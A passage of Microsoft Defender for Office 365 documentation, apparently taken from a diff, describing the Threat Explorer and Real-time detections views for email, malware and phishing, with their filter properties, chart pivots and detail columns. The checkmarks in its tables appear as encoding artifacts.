- - :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Report malware**
- <! The target URL is constructed such that it should open a new submission with the details filled out. But it takes me to the Email tab on the main Submissions page.>
- - :::image type="icon" source="../../media/m365-cc-sc-manage-indicator-icon.png" border="false"::: **Manage indicator**:
- - :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add indicator**
- - :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Manage in tenant block list**
-
- Selecting any of these options takes you to the **Submissions** page in the Defender portal.
-
- - :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More**:
- - :::image type="icon" source="../../media/m365-cc-sc-show-trends-icon.png" border="false"::: **View in Explorer**
- - :::image type="icon" source="../../media/m365-cc-sc-go-hunt-icon.png" border="false":::**Go hunt**
-- **Original URL**-- **Detection** section:
- - **Threat intelligence verdict**
- - **x active alerts y incidents**: A horizontal bar graph that shows the number of **High**, **Medium**, **Low**, and **Info** alerts that are related to this link.
- - A link to **View all incidents & alerts in URL page**.
-- **Domain details** section:
- - **Domain name** and a link to **View domain page**.
- - **Registrant**
- - **Registered on**
- - **Updated on**
- - **Expires on**
-- **Registrant contact info** section:
- - **Registrar**
- - **Country/Region**
- - **Mailing address**
- - **Email**
- - **Phone**
- - **More info**: A link to **Open at Whois**.
-- **URL prevalence (last 30 days)** section: Contains the number of **Devices**, **Email**, and **Clicks**. Select each value to view the full list.-- **Devices**: Shows the affected devices:
- - **Date (First / Last)**
- - **Devices**
-
- If more than two devices are involved, select **View all devices** to see all of them.
-
-
-#### Top clicks view for the details area of the All email view in Threat Explorer
-
-The **Top clicks** view shows a details table. You can sort the entries by clicking on an available column header:
--- **URL**-- **Blocked**-- **Allowed**-- **Block overridden**-- **Pending verdict**-- **Pending verdict bypassed**-- **None**-- **Error page**-- **Failure**-
-> [!TIP]
-> All available columns are selected. If you select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**, you can't deselect any columns.
->
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Zoom out in your web browser.
-
-When you select an entry by clicking anywhere in the row other than the check box next to the first column, a details flyout opens. The information in the flyout is the same as described in [Top URLs details for the All email view](#top-urls-details-for-the-all-email-view).
-
-#### Top targeted users view for the details area of the All email view in Threat Explorer
-
-The **Top targeted users** view organizes the data into a table of the top five recipients who were targeted by the most threats. The table contains the following information:
--- **Top targeted users**: The recipient's email address. If you select a recipient address, a details flyout opens. The information in the flyout is the same as described in [Recipient details from the Email view of the details area in the All email view](#recipient-details-from-the-email-view-of-the-details-area-in-the-all-email-view).--- The number of attempts: If you select the number of attempts, Threat Explorer opens in a new tab filtered by the recipient.-
-> [!TIP]
-> Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of up to 3000 users and the corresponding attempts.
-
-#### Email origin view for the details area of the All email view in Threat Explorer
-
-The **Email origin** view shows message sources on a map of the world.
--
-#### Campaign view for the details area of the All email view in Threat Explorer
-
-The **Campaign** view shows a details table. You can sort the entries by clicking on an available column header.
-
-The information in the table is the same as described in [details table on the Campaigns page](campaigns.md#details-area-on-the-campaigns-page).
-
-When you select an entry by clicking anywhere in the row other than the check box next to the **Name**, a details flyout opens. The information in the flyout is the same as described in [Campaign details](campaigns.md#campaign-details).
-
-## Malware view in Threat Explorer and Real-time detections
-
-The **Malware** view in Threat Explorer and Real-time detections shows information about email messages that were found to contain malware. This view is the default in Real-time detections.
-
-To open the **Malware** view, do one of the following steps:
--- **Threat Explorer**: On the **Explorer** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **Malware** tab. Or, go directly to the **Explorer** page using <https://security.microsoft.com/threatexplorerv3>, and then select the **Malware** tab.-- **Real-time detections**: On the **Real-time detections** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **Malware** tab. Or, go directly to the **Real-time detections** page using <https://security.microsoft.com/realtimereportsv3>, and then verify that the **Malware** tab is selected.--
-### Filterable properties in the Malware view in Threat Explorer and Real-time detections
-
-By default, no property filters are applied to the data. The steps to create filters (queries) are described in the [Filters in Threat Explorer and Real-time detections](#property-filters-in-threat-explorer-and-real-time-detections) section later in this article.
-
-The filterable properties that are available in the **Sender address** box in the **Malware** view are described in the following table:
-
-|Property|Type|Threat<br/>Explorer|Real-time<br/>detections|
-|||::|::|
-|**Basic**||||
-|Sender address|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Recipients|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Sender domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Recipient domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Subject|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Sender display name|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Sender mail from address|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Sender mail from domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Return path|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Return path domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Malware family|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Tags|Text. Separate multiple values by commas. <br/><br/> For more information about user tags, see [User tags](user-tags-about.md).|Γ£ö||
-|Exchange transport rule|Text. Separate multiple values by commas.|Γ£ö||
-|Data loss prevention rule|Text. Separate multiple values by commas.|Γ£ö||
-|Context|Select one or more values: <ul><li>**Evaluation**</li><li>**Priority account protection**</li></ul>|Γ£ö||
-|Connector|Text. Separate multiple values by commas.|Γ£ö||
-|Delivery action|Select one or more values: <ul><li>**Blocked**</li><li>**Delivered**</li><li>**Delivered to junk**</li><li>**Replaced**: Message attachments that were replaced by [Dynamic Delivery in Safe Attachments policies](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies).</li></ul>|Γ£ö|Γ£ö|
-|Additional action|Select one or more values: <ul><li>**Automated remediation**</li><li>**Dynamic Delivery**: For more information, see [Dynamic Delivery in Safe Attachments policies](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies).</li><li>**Manual remediation**</li><li>**None**</li><li>**Quarantine release**</li><li>**Reprocessed**</li><li>**ZAP**: For more information, see [Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365](zero-hour-auto-purge.md).</li></ul>|Γ£ö|Γ£ö|
-|Directionality|Select one or more values: <ul><li>**Inbound**</li><li>**Intra-irg**</li><li>**Outbound**</li></ul>|Γ£ö|Γ£ö|
-|Detection technology|Select one or more values: <ul><li>**Advanced filter**: Signals based on machine learning.</li><li>**Antimalware protection**</li><li>**Bulk**</li><li>**Campaign**</li><li>**Domain reputation**</li><li>**File detonation**: [Safe Attachments](safe-attachments-about.md) detected a malicious attachment during detonation analysis.</li><li>**File detonation reputation**: File attachments previously detected by [Safe Attachments](safe-attachments-about.md) detonations in other Microsoft 365 organizations.</li><li>**File reputation**: The message contains a file that was previously identified as malicious in other Microsoft 365 organizations.</li><li>**Fingerprint matching**: The message closely resembles a previous detected malicious message.</li><li>**General filter**</li><li>**Impersonation brand**: Sender impersonation of well-known brands.</li><li>**Impersonation domain**: Impersonation of sender domains that you own or specified for protection in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)</li><li>**Impersonation user**</li><li>**IP reputation**</li><li>**Mailbox intelligence impersonation**: Impersonation detections from mailbox intelligence in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).</li><li>**Mixed analysis detection**: Multiple filters contributed to the message verdict.</li><li>**spoof DMARC**: The message failed [DMARC authentication](email-authentication-dmarc-configure.md).</li><li>**Spoof external domain**: Sender email address spoofing using a domain that's external to your organization.</li><li>**Spoof intra-org**: Sender email address spoofing using a domain that's internal to your organization.</li><li>**URL detonation**: [Safe Links](safe-links-about.md) detected a malicious URL in the message during detonation analysis.</li><li>**URL detonation reputation**: URLs previously detected by [Safe Links](safe-links-about.md) detonations in other Microsoft 365 organizations.</li><li>**URL malicious reputation**: The message contains a URL that was previously identified as malicious in other Microsoft 365 organizations.</li></ul>|Γ£ö|Γ£ö|
-|Original delivery location|Select one or more values: <ul><li>**Deleted Items folder**</li><li>**Dropped**</li><li>**Failed**</li><li>**Inbox/folder**</li><li>**Junk folder**</li><li>**On-prem/external**</li><li>**Quarantine**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|Latest delivery location|Same values as **Original delivery location**</li></ul>|Γ£ö|Γ£ö|
-|Primary override|Select one or more values: <ul><li>**Allowed by organization policy**</li><li>**Allowed by user policy**</li><li>**Blocked by organization policy**</li><li>**Blocked by user policy**</li><li>**None**</li></ul>|Γ£ö|Γ£ö|
-|Primary override source|Messages can have multiple allow or block overrides as identified in **Override source**. The override that ultimately allowed or blocked the message is identified in **Primary override source**. <br/> Select one or more values: <ul><li>**3rd Party Filter**</li><li>**Admin initiated time travel** (ZAP)</li><li>**Antimalware policy block by file type**</li><li>**Antispam policy settings**</li><li>**Connection policy**</li><li>**Exchange transport rule**</li><li>**Exclusive mode (User override)**</li><li>**Filtering skipped due to on-prem organization**</li><li>**IP region filter from policy**</li><li>**Language filter from policy**</li><li>**Phishing Simulation**</li><li>**Quarantine release**</li><li>**SecOps Mailbox**</li><li>**Sender address list (Admin Override)**</li><li>**Sender address list (User override)**</li><li>**Sender domain list (Admin Override)**</li><li>**Sender domain list (User override)**</li><li>**Tenant Allow/Block List file block**</li><li>**Tenant Allow/Block List sender email address block**</li><li>**Tenant Allow/Block List spoof block**</li><li>**Tenant Allow/Block List URL block**</li><li>**Trusted contact list (User override)**</li><li>**Trusted domain (User override)**</li><li>**Trusted recipient (User override)**</li><li>**Trusted senders only (User override)**</li></ul>|Γ£ö|Γ£ö|
-|Override source|Same values as **Primary override source**</li></ul>|Γ£ö|Γ£ö|
-|Policy type|Select one or more values: <ul><li>**Anti-malware policy**</li><li>**Anti-phishing policy**</li><li>**Exchange transport rule** (mail flow rule), **Hosted content filter policy** (anti-spam policy), **Hosted outbound spam filter policy** (outbound spam policy), **Safe Attachments policy**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|Policy action|Select one or more values: <ul><li>**Add x-header**</li><li>**Bcc message**</li><li>**Delete message**</li><li>**Modify subject**</li><li>**Move to Junk Email folder**</li><li>**No action taken**</li><li>**Redirect message**</li><li>**Send to quarantine**</li></ul>|Γ£ö|Γ£ö|
-|Email size|Integer. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|**Advanced**||||
-|Internet Message ID|Text. Separate multiple values by commas. <br/><br/> Available in the **Message-ID** header field in the message header. An example value is `<08f1e0f6806a47b4ac103961109ae6ef@server.domain>` (note the angle brackets).|Γ£ö|Γ£ö|
-|Network message ID|Text. Separate multiple values by commas. <br/><br/> A GUID value that's available in the **X-MS-Exchange-Organization-Network-Message-Id** header field in the message header.|Γ£ö|Γ£ö|
-|Sender IP|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Attachment SHA256|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Cluster ID|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Alert ID|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Alert Policy ID|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Campaign ID|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|ZAP URL signal|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|**Urls**||||
-|URL Count|Integer. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|URL domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|URL domain and path|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|URL|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|URL path|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|URL source|Select one or more values: <ul><li>**Attachments**</li><li>**Cloud attachment**</li><li>**Email body**</li><li>**Email header**</li><li>**QR Code**</li><li>**Subject**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|Click verdict|Select one or more values: <ul><li>**Allowed**</li><li>**Block overridden**</li><li>**Blocked**</li><li>**Error**</li><li>**Failure**</li><li>**None**</li><li>**Pending verdict**</li><li>**Pending verdict bypassed**</li></ul>|Γ£ö|Γ£ö|
-|URL Threat|Select one or more values: <ul><li>**Malware**</li><li>**Phish**</li><li>**Spam**</li></ul>|Γ£ö|Γ£ö|
-|**File**||||
-|Attachment Count|Integer. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Attachment filename|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|File type|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|File Extension|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|File Size|Integer. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|**Authentication**||||
-|SPF|Select one or more values: <ul><li>**Fail**</li><li>**Neutral**</li><li>**None**</li><li>**Pass**</li><li>**Permanent error**</li><li>**Soft fail**</li><li>**Temporary error**</li></ul>|Γ£ö|Γ£ö|
-|DKIM|Select one or more values: <ul><li>**Error**</li><li>**Fail**</li><li>**Ignore**</li><li>**None**</li><li>**Pass**</li><li>**Test**</li><li>**Timeout**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|DMARC|Select one or more values: <ul><li>**Best guess pass**</li><li>**Fail**</li><li>**None**</li><li>**Pass**</li><li>**Permanent error**</li><li>**Selector pass**</li><li>**Temporary error**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|Composite|Select one or more values: <ul><li>**Fail**</li><li>**None**</li><li>**Pass**</li><li>**Soft pass**</li></ul>|
-
-### Pivots for the chart in the Malware view in Threat Explorer and Real-time Detections
-
-The chart has a default view, but you can select a value from **Select pivot for histogram chart** to change how the filtered or unfiltered chart data is organized and displayed.
-
-The chart pivots that are available in the **Malware** view in Threat Explorer and Real-time detections are listed in the following table:
-
-|Pivot|Threat<br/>Explorer|Real-time<br/>detections|
-||::|::|
-|**Malware family**|Γ£ö||
-|**Sender domain**|Γ£ö||
-|**Sender IP**|Γ£ö||
-|**Delivery action**|Γ£ö|Γ£ö|
-|**Detection technology**|Γ£ö|Γ£ö|
-
-The available chart pivots are described in the following subsections.
-
-#### Malware family chart pivot in the Malware view in Threat Explorer
-
-Although this pivot doesn't look selected by default, **Malware family** is the default chart pivot in the **Malware** view in Threat Explorer.
-
-The **Malware family** pivot organizes the chart by the malware family detected in messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each malware family.
-
-#### Sender domain chart pivot in the Malware view in Threat Explorer
-
-The **Sender domain** pivot organizes the chart by the sender domain of messages that were found to contain malware for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each sender domain.
-
-#### Sender IP chart pivot in the Malware view in Threat Explorer
-
-The **Sender IP** pivot organizes the chart by the source IP address of messages that were found to contain malware for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each source IP address.
-
-#### Delivery action chart pivot in the Malware view in Threat Explorer and Real-time detections
-
-Although this pivot doesn't look selected by default, **Delivery action** is the default chart pivot in the **Malware** view in Real-time detections.
-
-The **Delivery action** pivot organizes the chart by what happened to messages that were found to contain malware for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each delivery action.
-
-#### Detection technology chart pivot in the Malware view in Threat Explorer and Real-time detections
-
-The **Detection technology** pivot organizes the chart by the feature that identified malware in messages for the specified date/time range and property filters.
--
-Hovering over a data point in the chart shows the count for each detection technology.
-
-### Views for the details area of the Malware view in Threat Explorer and Real-time detections
-
-The available views (tabs) in the details area of the **Malware** view are listed in the following table, and are described in the following subsections.
-
-|View|Threat<br/>Explorer|Real-time<br/>detections|
-||::|::|
-|**Email**|Γ£ö|Γ£ö|
-|**Top malware families**|Γ£ö||
-|**Top targeted users**|Γ£ö||
-|**Email origin**|Γ£ö||
-|**Campaign**|Γ£ö||
-
-#### Email view for the details area of the Malware view in Threat Explorer and Real-time detections
-
-**Email** is the default view for the details area of the **Malware** view in Threat Explorer and Real-time detections.
-
-The **Email** view shows a details table. You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown.
-
-The following table shows the columns that are available in Threat Explorer and Real-time detections. The default values are marked with an asterisk (<sup>\*</sup>).
-
-|Column|Threat<br/>Explorer|Real-time<br/>detections|
-||::|::|
-|**Date**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Subject**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Recipient**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Recipient domain**|Γ£ö|Γ£ö|
-|**Tags**<sup>\*</sup>|Γ£ö||
-|**Sender address**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Sender display name**|Γ£ö|Γ£ö|
-|**Sender domain**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Sender IP**|Γ£ö|Γ£ö|
-|**Sender mail from address**|Γ£ö|Γ£ö|
-|**Sender mail from domain**|Γ£ö|Γ£ö|
-|**Additional actions**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Delivery action**|Γ£ö|Γ£ö|
-|**Latest delivery location**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Original delivery location**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**System overrides source**|Γ£ö|Γ£ö|
-|**System overrides**|Γ£ö|Γ£ö|
-|**Alert ID**|Γ£ö|Γ£ö|
-|**Internet message ID**|Γ£ö|Γ£ö|
-|**Network message ID**|Γ£ö|Γ£ö|
-|**Mail language**|Γ£ö|Γ£ö|
-|**Exchange transport rule**|Γ£ö||
-|**Connector**|Γ£ö||
-|**Context**|Γ£ö|Γ£ö|
-|**Data loss prevention rule**|Γ£ö|Γ£ö|
-|**Threat type**<sup>\*</sup>|Γ£ö|Γ£ö|
-|**Detection technology**|Γ£ö|Γ£ö|
-|**Attachment Count**|Γ£ö|Γ£ö|
-|**URL Count**|Γ£ö|Γ£ö|
-|**Email size**|Γ£ö|Γ£ö|
-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
->
-> Customized column settings are saved per user. Customized column settings in Incognito or InPrivate browsing mode are saved until you close the web browser.
-
-When you select one or more entries from the list by selecting the check box next to the first column, **Message actions** is available. For information, see [Threat hunting: Email remediation](threat-explorer-threat-hunting.md#email-remediation).
-
-When you click on the **Subject** or **Recipient** values in an entry, details flyouts open. These flyouts are described in the following subsections.
-
-##### Email details from the Email view of the details area in the Malware view
-
-When you select the **Subject** value of an entry in the table, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains standardized summary information that's also available on the [Email entity page](mdo-email-entity-page.md) for the message.
-
-For details about the information in the Email summary panel, see [The Email summary panels](mdo-email-entity-page.md#the-email-summary-panel).
-
-The available actions at the top of the Email summary panel for Threat Explorer and Real-time detections are described in the [Email details from the Email view of the details area in the All email view](#email-details-from-the-email-view-of-the-details-area-in-the-all-email-view).
-
-##### Recipient details from the Email view of the details area in the Malware view
-
-When you select an entry by clicking on the **Recipient** value, a details flyout opens. The information in the flyout is the same as described in [Recipient details from the Email view of the details area in the All email view](#recipient-details-from-the-email-view-of-the-details-area-in-the-all-email-view).
-
-#### Top malware families view for the details area of the Malware view in Threat Explorer
-
-The **Top malware families** view for the details area organizes the data into a table of the top malware families. The table shows:
--- **Top malware families** column: The malware family name.-
- If you select a malware family name, a details flyout opens that contains the following information:
-
- - **Email** section: A table showing the following related information for messages that contain the malware file:
- - **Date**
- - **Subject**
- - **Recipient**
-
- Select **View all email** to open Threat Explorer in a new tab filtered by the malware family name.
-
- - **Technical details** section
-
- :::image type="content" source="../../media/te-rtd-malware-view-details-area-top-malware-families-details-flyout.png" alt-text="Screenshot of the details flyout after you select a malware family from the Top malware families tab of the details area in the Malware view of Threat Explorer." lightbox="../../media/te-rtd-malware-view-details-area-top-malware-families-details-flyout.png":::
--- The number of attempts: If you select the number of attempts, Threat Explorer opens in a new tab filtered by the malware family name.-
-#### Top targeted users view for the details area of the Malware view in Threat Explorer
-
-The **Top targeted users** view organizes the data into a table of the top five recipients who were targeted by malware. The table shows:
--- **Top targeted users**: The email address of the top targeted user. If you select an email address, a details flyout opens. The information in the flyout is the same as described in [Top targeted users view for the details area of the All email view in Threat Explorer](#top-targeted-users-view-for-the-details-area-of-the-all-email-view-in-threat-explorer).--- The number of attempts: If you select the number of attempts, Threat Explorer opens in a new tab filtered by the malware family name.-
-> [!TIP]
-> Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of up to 3000 users and the corresponding attempts.
-
-#### Email origin view for the details area of the Malware view in Threat Explorer
-
-The **Email origin** view shows message sources on a map of the world.
-
-#### Campaign view for the details area of the Malware view in Threat Explorer
-
-The **Campaign** view shows a details table. You can sort the entries by clicking on an available column header.
-
-The details table is identical to the [details table on the Campaigns page](campaigns.md#details-area-on-the-campaigns-page).
-
-When you select an entry by clicking anywhere in the row other than the check box next to the **Name**, a details flyout opens. The information in the flyout is the same as described in [Campaign details](campaigns.md#campaign-details).
-
-## Phish view in Threat Explorer and Real-time detections
-
-The **Phish** view in Threat Explorer and Real-time detections shows information about email messages that were identified as phishing.
-
-To open the **Phish** view, do one of the following steps:
--- **Threat Explorer**: On the **Explorer** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **Phish** tab. Or, go directly to the **Explorer** page using <https://security.microsoft.com/threatexplorerv3>, and then select the **Phish** tab.-- **Real-time detections**: On the **Real-time detections** page in the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer** \> **Phish** tab. Or, go directly to the **Real-time detections** page using <https://security.microsoft.com/realtimereportsv3>, and then select the **Phish** tab.--
-### Filterable properties in the Phish view in Threat Explorer and Real-time detections
-
-By default, no property filters are applied to the data. The steps to create filters (queries) are described in the [Filters in Threat Explorer and Real-time detections](#property-filters-in-threat-explorer-and-real-time-detections) section later in this article.
-
-The filterable properties that are available in the **Sender address** box in the **Malware** view are described in the following table:
-
-|Property|Type|Threat<br/>Explorer|Real-time<br/>detections|
-|||::|::|
-|**Basic**||||
-|Sender address|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Recipients|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Sender domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Recipient domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Subject|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Sender display name|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Sender mail from address|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Sender mail from domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Return path|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Return path domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Tags|Text. Separate multiple values by commas. <br/><br/> For more information about user tags, see [User tags](user-tags-about.md).|Γ£ö||
-|Impersonated domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Impersonated user|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Exchange transport rule|Text. Separate multiple values by commas.|Γ£ö||
-|Data loss prevention rule|Text. Separate multiple values by commas.|Γ£ö||
-|Context|Select one or more values: <ul><li>**Evaluation**</li><li>**Priority account protection**</li></ul>|Γ£ö||
-|Connector|Text. Separate multiple values by commas.|Γ£ö||
-|Delivery action|Select one or more values: <ul><li>**Blocked**</li><li>**Delivered**</li><li>**Delivered to junk**</li><li>**Replaced**: Message attachments that were replaced by [Dynamic Delivery in Safe Attachments policies](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies).</li></ul>|Γ£ö|Γ£ö|
-|Additional action|Select one or more values: <ul><li>**Automated remediation**</li><li>**Dynamic Delivery**</li><li>**Manual remediation**</li><li>**None**</li><li>**Quarantine release**</li><li>**Reprocessed**</li><li>**ZAP**</li></ul>|Γ£ö|Γ£ö|
-|Directionality|Select one or more values: <ul><li>**Inbound**</li><li>**Intra-irg**</li><li>**Outbound**</li></ul>|Γ£ö|Γ£ö|
-|Detection technology|Select one or more values: <ul><li>**Advanced filter**</li><li>**Antimalware protection**</li><li>**Bulk**</li><li>**Campaign**</li><li>**Domain reputation**</li><li>**File detonation**</li><li>**File detonation reputation**</li><li>**File reputation**</li><li>**Fingerprint matching**</li><li>**General filter**</li><li>**Impersonation brand**</li><li>**Impersonation domain**</li><li>**Impersonation user**</li><li>**IP reputation**</li><li>**Mailbox intelligence impersonation**</li><li>**Mixed analysis detection**</li><li>**spoof DMARC**</li><li>**Spoof external domain**</li><li>**Spoof intra-org**</li><li>**URL detonation**</li><li>**URL detonation reputation**</li><li>**URL malicious reputation**</li></ul>|Γ£ö|Γ£ö|
-|Original delivery location|Select one or more values: <ul><li>**Deleted Items folder**</li><li>**Dropped**</li><li>**Failed**</li><li>**Inbox/folder**</li><li>**Junk folder**</li><li>**On-prem/external**</li><li>**Quarantine**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|Latest delivery location|Same values as **Original delivery location**</li></ul>|Γ£ö|Γ£ö|
-|Phish confidence level|Select one or more values: <ul><li>**High**</li><li>**Normal**</li></ul>|Γ£ö||
-|Primary override|Select one or more values: <ul><li>**Allowed by organization policy**</li><li>**Allowed by user policy**</li><li>**Blocked by organization policy**</li><li>**Blocked by user policy**</li><li>**None**</li></ul>|Γ£ö|Γ£ö|
-|Primary override source|Messages can have multiple allow or block overrides as identified in **Override source**. The override that ultimately allowed or blocked the message is identified in **Primary override source**. <br/> Select one or more values: <ul><li>**3rd Party Filter**</li><li>**Admin initiated time travel** (ZAP)</li><li>**Antimalware policy block by file type**</li><li>**Antispam policy settings**</li><li>**Connection policy**</li><li>**Exchange transport rule**</li><li>**Exclusive mode (User override)**</li><li>**Filtering skipped due to on-prem organization**</li><li>**IP region filter from policy**</li><li>**Language filter from policy**</li><li>**Phishing Simulation**</li><li>**Quarantine release**</li><li>**SecOps Mailbox**</li><li>**Sender address list (Admin Override)**</li><li>**Sender address list (User override)**</li><li>**Sender domain list (Admin Override)**</li><li>**Sender domain list (User override)**</li><li>**Tenant Allow/Block List file block**</li><li>**Tenant Allow/Block List sender email address block**</li><li>**Tenant Allow/Block List spoof block**</li><li>**Tenant Allow/Block List URL block**</li><li>**Trusted contact list (User override)**</li><li>**Trusted domain (User override)**</li><li>**Trusted recipient (User override)**</li><li>**Trusted senders only (User override)**</li></ul>|Γ£ö|Γ£ö|
-|Override source|Same values as **Primary override source**</li></ul>|Γ£ö|Γ£ö|
-|Policy type|Select one or more values: <ul><li>**Anti-malware policy**</li><li>**Anti-phishing policy**</li><li>**Exchange transport rule** (mail flow rule), **Hosted content filter policy** (anti-spam policy), **Hosted outbound spam filter policy** (outbound spam policy), **Safe Attachments policy**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|Policy action|Select one or more values: <ul><li>**Add x-header**</li><li>**Bcc message**</li><li>**Delete message**</li><li>**Modify subject**</li><li>**Move to Junk Email folder**</li><li>**No action taken**</li><li>**Redirect message**</li><li>**Send to quarantine**</li></ul>|Γ£ö|Γ£ö|
-|Email size|Integer. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|**Advanced**||||
-|Internet Message ID|Text. Separate multiple values by commas. <br/><br/> Available in the **Message-ID** header field in the message header. An example value is `<08f1e0f6806a47b4ac103961109ae6ef@server.domain>` (note the angle brackets).|Γ£ö|Γ£ö|
-|Network message ID|Text. Separate multiple values by commas. <br/><br/> A GUID value that's available in the **X-MS-Exchange-Organization-Network-Message-Id** header field in the message header.|Γ£ö|Γ£ö|
-|Sender IP|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Attachment SHA256|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Cluster ID|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Alert ID|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Alert Policy ID|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|Campaign ID|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|ZAP URL signal|Text. Separate multiple values by commas.|Γ£ö||
-|**Urls**||||
-|URL Count|Integer. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|URL domain|Text. Separate multiple values by commas.|Γ£ö|Γ£ö|
-|URL domain and path|Text. Separate multiple values by commas.|Γ£ö||
-|URL|Text. Separate multiple values by commas.|Γ£ö||
-|URL path|Text. Separate multiple values by commas.|Γ£ö||
-|URL source|Select one or more values: <ul><li>**Attachments**</li><li>**Cloud attachment**</li><li>**Email body**</li><li>**Email header**</li><li>**QR Code**</li><li>**Subject**</li><li>**Unknown**</li></ul>|Γ£ö|Γ£ö|
-|Click verdict|Select one or more values: <ul><li>**Allowed**</li><li>**Block overridden**</li><li>**Blocked**</li><li>**Error**</li><li>**Failure**</li><li>**None**</li><li>**Pending verdict**</li><li>**Pending verdict bypassed**</li></ul>|Γ£ö|Γ£ö|
-|URL Threat|Select one or more values: <ul><li>**Malware**</li><li>**Phish**</li><li>**Spam**</li></ul>|Γ£ö|Γ£ö|
-|**File**||||
-|Attachment Count|Integer. Separate multiple values by commas.|Γ£ö|Γ£ö|
